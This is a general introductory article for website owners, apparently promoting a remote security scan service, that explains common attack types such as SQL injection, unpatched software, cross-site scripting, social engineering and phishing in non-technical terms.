Introduction
Protecting your website and your customers' sensitive information involves a multitude of different approaches; servers' operating system, servers' applications, employees, access controls, management support, etc.
In a world where the protection of systems (and the information they hold) is a constant evolving effort, and the challenges multiply as those driven by money join the hobbists, constant due diligence is required. While you may "do everything right" and your system is "secure" against known vulnerabilities, situations change and if you're not careful, your system can easily become exposed to malicious activities.
The following is by no means an exhaustive list. It is meant to explain some of the more common attack methods employed today, and to help you and your company start taking a broader approach to website security.
SQL Injection
SQL Injection is one the most pervasive security vulnerabilities on the web today. It basically takes advantage of poorly constructed stored procedures.
This method allows the attacker to create, read, update, or delete any arbitrary data accessible. The most serious scenario is when the attacker can completely compromise the database system and associated services.
Software Not Kept Up-to-Date
There tends to be three reasons why software is not kept up-to-date:
1. Lack of Awareness: Despite all the discussions around web security, and how just keeping the software up-to-date would make a significant impact on keeping your site secure, it's still not as widely acknowledged as it should be.
2. Not a priority: Closely related to the bullet above, when maintaining a secure website is not a clear corporate priority, it often takes a backseat to other activities.
3. Compatability with Other Software: Depending on the number of different applications that are used, there may be a multitude of different updates that a website owner would need to apply. It's a commonly accepted practice that before any upgrade is applied, thorough testing to ensure compatability is required. With this important QA process in place, it's easy to sympathize with any website owner that has to deal with this situation. However, ensuring the website has the latest upgrades, especially those patching on critical security flaws, can save the website owner time, effort and grief in the long-run.
Cross-Site Scripting (XSS)
Cross site scripting, also known as XSS, is another common security vulnerability.
XSS allows websites to be defaced, malicious code to be added, and support phishing attempts, among other issues.
Essentially a malicious person can use this methodology to send a script to an unsuspecting user. The recepient’s browser assumes the code can be trusted and will execute the script. The script can access any cookies, session tokens, or other sensitive information retained by the browser and used within that site. It's also possible to change the content of the webpages on the website.
Social Engineering
This is a little different from the above vulnerabilities, in that this focuses on the people rather than just looking at specific vulnerabilities in specific pieces of software.
It's all too seldom that these collage of security vulnerabilities are discussed together. It's quite well known is the retail industry that most theft comes from employees, not shoppers or professional thieves. While we don't suggest anyone's employees are particularly deceptive, it's unfortunate that isn't discussed more often. One reason for this is that companies - quite understandably - often choose to deal with these matters quietly.
On a more positive side, training and documenting procedures can certainly help ensure that basic, yet very important, processes are observed.
Another type of social engineering involves gaining trust with the employees. A recent article on social engineering pointed to a successful method. A CEO was traveling to a seminar where they were to deliver a keynote speech. Of course this information is published and widely known. A malicious attacker called up the company a few minutes before the presentation, stated they were helping their CEO prepare for the meeting but needed access to the network. Of course the employees, wanting to help their CEO, especially during a critical time, immediately helped the malicious attacker with the requested information.
It's important to understand the various ways social engineering takes place, and educate your team to only disclose information to people that are known.
Phishing
Phishing is when someone sets up a website that is designed to look like another website. eBay is a very well known example of very frequent phishing attempts. Malicious attackers will setup a website that looks exactly like the target website (early phishing attempts were more amateurish, but has recently evolved into some very authentic-looking sites) and ask users to "sign in". Once the user "signs in", which essentially divulges the username / password to the malicious attacker, the malicious attacker is able to access their account.
Phishing is a little different from other malicious attacks in that the website owner has practical little ability to combat this method. Organizations have been formed to identify, and readily disseminate information on sites that are being used for conducting phishing attacks.
Summary
The limit in the number of methods to gain access is only limited by human being's imagination. We clearly have some very imaginative people who have the skill and desire to test your site's vulnerability.
Engaging in remote security scan service is one of the key arsenals a website owner needs to ensure a secure environment for their customers.
|
